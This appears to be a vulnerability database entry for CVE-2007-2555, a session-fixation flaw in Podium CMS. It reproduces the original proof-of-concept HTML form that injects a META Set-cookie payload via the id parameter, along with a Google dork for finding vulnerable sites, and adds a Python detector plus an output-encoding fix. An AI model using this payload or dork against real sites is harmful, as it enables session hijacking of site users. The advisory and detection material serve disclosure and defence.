Podium CMS META HTTP-EQUIV Set-cookie Unspecified Session Hijacking Vulnerability

Vulnerability ID: 1190646 Vulnerability type: Authorization issue
Published: 2007-05-09 Updated: 2007-05-09
CVE ID: CVE-2007-2555 CNNVD-ID: CNNVD-200705-176
Platform: N/A CVSS score: 4.3
|Vulnerability source
https://www.securityfocus.com/bid/81797
https://cxsecurity.com/issue/WLB-2007050018
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-176
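|Vulnerability details
An unspecified vulnerability exists in Default.aspx in Podium CMS. A remote attacker can use a META HTTP-EQUIV Set-cookie expression in the id parameter to cause an unknown impact, possibly session fixation.
|Exploit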
<!--

Podium CMS - Cookie Manipulation Exploit

Vulnerable: All Versions
Google d0rk: inurl:"podium/Default.aspx"

John Martinelli
john (at) martinelli (dot) com [email concealed]
http://john-martinelli.com

May 5th, 2007

!-->

<html>
<head><title>Podium CMS - Cookie Manipulation Exploit</title><body>

<center><br><br><font size=4>Podium CMS - Cookie Manipulation Exploit</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a><br><br>Google d0rk: <a href="http://www.google.com/search?hl=en&safe=off&q=inurl%3A%22podium%2F
Default.aspx">inurl:"podium/Default.aspx"</a></font><br>

<br><br>
<form action="http://target.com/podium/Default.aspx" method="post">
<input name="id" size=75 value="<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>">

<input type=submit value="Execute Cookie Manipuation" class="button">
</form>

</body></html>
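Added example, not part of the original advisory or exploit: a Python check that flags requests whose `id` parameter carries the `<meta http-equiv='Set-cookie'>` pattern shown above, together with the output encoding that neutralises it. It assumes the `id` value is echoed into the page unencoded (the PoC implies this; the advisory calls the flaw unspecified); the function names and sample request bodies are constructed.

```python
import html
import re
from urllib.parse import parse_qs, unquote_plus

# <meta ... http-equiv = set-cookie ...>: any case, optional quotes, any attribute order
META_SET_COOKIE = re.compile(
    r"<\s*meta\b[^>]*\bhttp-equiv\s*=\s*[\"']?\s*set-cookie\b",
    re.IGNORECASE,
)

def normalize(value, max_rounds=3):
    """Undo repeated URL-encoding so double-encoded variants still match."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def id_sets_cookie(raw_params):
    """True if any 'id' value in a query string or form body carries the meta tag."""
    values = parse_qs(raw_params, keep_blank_values=True).get("id", [])
    return any(META_SET_COOKIE.search(normalize(v)) for v in values)

def encode_for_html(value):
    """Output encoding to apply before echoing 'id' into the page (assumed fix)."""
    return html.escape(value, quote=True)

# Constructed sample request bodies (not taken from real traffic)
SAMPLES = [
    "id=42",
    "id=%3Cmeta+http-equiv%3D%27Set-cookie%27+content%3D%27cookiename%3Dcookievalue%27%3E",
    "id=%253CMETA%2520HTTP-EQUIV%253Dset-cookie%2520content%253Da%253Db%253E",
    "id=meta+tags+and+cookies",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(id_sets_cookie(body), body)
```

Once encoded, the value reaches the browser as text rather than as a `<meta>` element, so no cookie is set from it.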
|Affected products
Podium Cms Podium Cms 0
|References

Source: BUGTRAQ
Name: 20070509 Re: Podium CMS - Cookie Manipulation Exploit
Link: http://www.securityfocus.com/archive/1/archive/1/468058/100/0/threaded
Source: BUGTRAQ
Name: 20070505 Podium CMS - Cookie Manipulation Exploit
Link: http://www.securityfocus.com/archive/1/archive/1/467823/100/0/threaded
Source: SREASON
Name: 2664
Link: http://securityreason.com/securityalert/2664
Source: OSVDB
Name: 36182
Link: http://osvdb.org/36182